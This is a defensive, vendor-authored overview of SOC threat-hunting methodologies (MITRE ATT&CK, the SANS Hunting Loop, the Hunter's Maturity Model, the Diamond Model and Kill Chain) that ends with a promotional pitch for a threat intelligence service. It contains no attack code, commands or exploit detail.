Threat Hunting: Building Threat-Informed Defence in Your SOC

• Attackers Move Faster than Defenders: Threat actors exploit gaps in visibility, misconfigurations, and novel tactics, techniques and procedures (TTPs). By the time an alert fires, damage may already be done. Hunting helps you catch these subtle intrusions earlier.
• Detection Gaps Are Inevitable: No matter how advanced your tools, there will be blind spots. Threat hunting exposes those gaps and feeds improvements back into detection engineering.
• SOC Maturity and Analyst Skill Growth: Hunting develops analyst expertise, strengthens defensive posture, and transitions the SOC from reactive firefighting to proactive security.

Different organisations have proposed structured methodologies for threat hunting. Here are the most prominent:

MITRE ATT&CK®-Driven Hunting

The MITRE ATT&CK® framework is one of the most widely adopted tools for structuring threat hunts. Rather than starting from scratch, analysts can anchor their hunts in a globally recognised catalogue of adversary tactics and techniques. ATT&CK doesn’t just tell you what attackers do, it provides a roadmap for how to detect them.

A typical ATT&CK-driven hunting process follows these steps:

• Select Relevant Tactics and Techniques: Start by choosing ATT&CK techniques based on your threat model, recent intelligence, or adversary profiles. For example, if your organisation is targeted by ransomware actors, you might focus on techniques in the Execution and Impact tactics.
• Form a Hypothesis: Translate the chosen technique into a hypothesis. For instance: “An adversary may be using PowerShell (T1059.001) for initial execution in our environment.”
• Map to Available Data Sources: Use ATT&CK’s guidance on data sources to determine what telemetry you’ll need. For PowerShell execution, this might include process creation logs, PowerShell operational logs, or endpoint telemetry.
• Hunt in the Environment: Build queries or detections in your SIEM/EDR to test the hypothesis. Look for activity matching the ATT&CK technique, such as unusual PowerShell command lines.
• Investigate and Enrich: If suspicious activity is found, enrich it with context: when did it occur, which accounts were involved, is it tied to known adversary campaigns?
• Operationalise Findings: Feed validated findings back into your detection engineering process, for example, creating a new SIEM rule, EDR detection, or SOAR playbook mapped directly to the ATT&CK technique.
• Measure Coverage: Document which ATT&CK techniques are now covered, identify remaining gaps, and plan the next hunt. Over time, this builds a measurable “ATT&CK coverage map” of your environment.

SANS Threat Hunting Process (The Hunting Loop)

The SANS Institute’s Threat Hunting Loop provides a structured, repeatable process for hunts. It is an intelligence-driven methodology, but with defined stages that make it more than just using threat intel. The loop consists of:

• Hypothesis Generation: Starting with a question based on threat intelligence or observed activity.
• Profiling the Environment: Establishing baselines of normal behaviour to spot anomalies.
• Hunting: Actively testing the hypothesis by querying available data sources.
• Discovery and Enrichment: Investigating findings, correlating with other data, and gathering context.
• Operationalisation: Feeding discoveries back into detections, dashboards, or playbooks to strengthen defences.

This cyclical process ensures hunts not only identify potential threats but also continuously improve detection capabilities.

Hunter’s Maturity Model (HMM)

The Hunter’s Maturity Model (HMM) was developed by Sqrrl, later acquired by Amazon and integrated into AWS’s security services. HMM outlines stages of hunting maturity:

• Level 0: No hunting, reactive operations only.
• Level 1: Unstructured, ad hoc hunts.
• Level 2: Structured, repeatable hunts.
• Level 3: Proactive, automated, and innovative hunts.

This model remains a widely used way for SOCs to benchmark where they are on their hunting journey and chart a path toward maturity.

Analytic Frameworks for Guiding Hunts (Diamond Model and Kill Chain)

• Diamond Model for Intrusion Analysis: Focuses on four nodes, adversary, capability, infrastructure, and victim, and the relationships between them. Analysts can pivot across these nodes to generate hypotheses and better understand adversary behaviour.
• Cyber Kill Chain® (Lockheed Martin): Breaks down an adversary attack into seven phases: reconnaissance, weaponisation, delivery, exploitation, installation, command and control, and actions on objectives. It helps hunters frame their work by asking: “At which phase are we most likely to detect this activity in our environment?”

While not frameworks for TTPs in the same sense as MITRE ATT&CK, both models give analysts useful structures to guide hunts and anticipate adversary behaviour.

TAHITI Methodology (Emerging)

Some SOC teams adopt lightweight, iterative hunting methods inspired by frameworks like TAHITI (Threat-Informed Analysis for Tactical Hunts and Investigations). While not as widely formalised or adopted as ATT&CK or the SANS Loop, these approaches emphasise:

• Short cycles of hypothesis and testing
• Rapid feedback into detections
• Flexibility over rigid process

This style suits agile teams who want fast results without the overhead of a full formal framework.

• Clear Hypotheses: Hunts should start with a focused, testable question (e.g., “Are adversaries using living-off-the-land binaries to move laterally in our network?”).
• Threat Intelligence Integration: Quality cyber threat intelligence provides the seed for relevant hunts and ensures defenders are testing against real-world TTPs.
• Data Coverage and Visibility: Hunts are only as strong as the telemetry available, endpoint, network, cloud, and identity data must be ingested and searchable.
• Repeatability and Documentation: Each hunt should produce lessons learned, new detections, and playbooks for future use.
• Feedback Loop to Detection Engineering: Findings from hunts must feed directly into SIEM/SOAR detections, improving resilience over time.

• Unstructured “Fishing Expeditions”: Hunting without hypotheses wastes time and erodes analyst confidence.
• Over-Reliance on Tools Alone: Technology supports hunting, but analyst curiosity and critical thinking are irreplaceable.
• Failure to Operationalise Results: If hunts don’t improve detection coverage or incident response, they’re wasted effort.
• Not Measuring Value: Without metrics, such as detection coverage improvements, dwell time reduction, or successful hypothesis validation, executive buy-in may fade.
• Burnout and Scope Creep: Analysts tasked with constant ad hoc hunts without a process risk fatigue and inconsistent outcomes.

Threat-informed defence is the practice of grounding your security operations in a clear understanding of how adversaries actually operate. Instead of building defences around generic risks or vendor-driven priorities, you align security controls, detection engineering, and response playbooks to real-world adversary TTPs.

In this model, frameworks like MITRE ATT&CK, the Diamond Model, and the SANS Hunting Loop aren’t academic exercises, they are the scaffolding that keeps your defence program anchored to reality.

Where threat hunting fits:

• Threat hunting becomes the validation engine for threat-informed defence.
• By testing hypotheses against adversary TTPs, hunts reveal whether your environment can detect and withstand those behaviours.
• Every hunt produces lessons learned: gaps in telemetry, missing detections, or untested assumptions. Those lessons feed back into detection engineering and defensive controls.
• Over time, this cycle ensures your defences are not just theoretical but battle-tested against the threats that matter most to you.

Put simply: threat-informed defence sets the strategy, and threat hunting executes it in practice. The result is a SOC that no longer waits for attackers to announce themselves but continuously checks whether its defences stand up to the adversaries most likely to come knocking.

Threat hunting is only as strong as the intelligence it’s built on. Too often, “threat intelligence” is treated as a feed of indicators of compromise (IOCs), IP addresses, file hashes, or domain names. While IOCs can support detection, they cannot drive threat hunting. By the time an IOC is distributed, it may already be obsolete, burned, or irrelevant to your environment. Hunting based on these alone quickly becomes a game of whack-a-mole.

Real threat hunting requires intelligence that answers bigger questions:

• Which threat actors are likely to target my industry and geography? Understanding the adversaries most relevant to your organisation ensures you’re not chasing ghosts, but focusing on real risks.
• Which techniques do those adversaries use? Mapping adversary behaviour to frameworks like MITRE ATT&CK highlights where you should focus your hunts and what data you’ll need.
• When were those techniques and campaigns active? Bounding intelligence in timeframes matters. Techniques used three years ago may not be relevant today, while emerging campaigns might demand immediate hunts.

Good intelligence informs what to hunt, when to hunt it, and why it matters. This elevates hunting from ad hoc curiosity to a strategic capability.

Arachne Digital provides intelligence that goes beyond static indicators. Our threat intelligence highlights the adversaries most likely to target you, the techniques they employ, and the industries and regions they focus on, all bounded in time. This is the type of intelligence that fuels proactive hunts, closes detection gaps, and enables threat-informed defence.

Reach out to us for more details.

Threat hunting is one of the clearest signs of SOC maturity. It demands curiosity, structure, and a willingness to learn from both successes and failures. Whether you start with ATT&CK, intelligence-driven hunts, or a maturity model, the key is to build a repeatable process that grows with your organisation.

These insights are not abstract theory, they’re the foundation of how modern defenders close detection gaps, validate assumptions, and build resilience against today’s adversaries.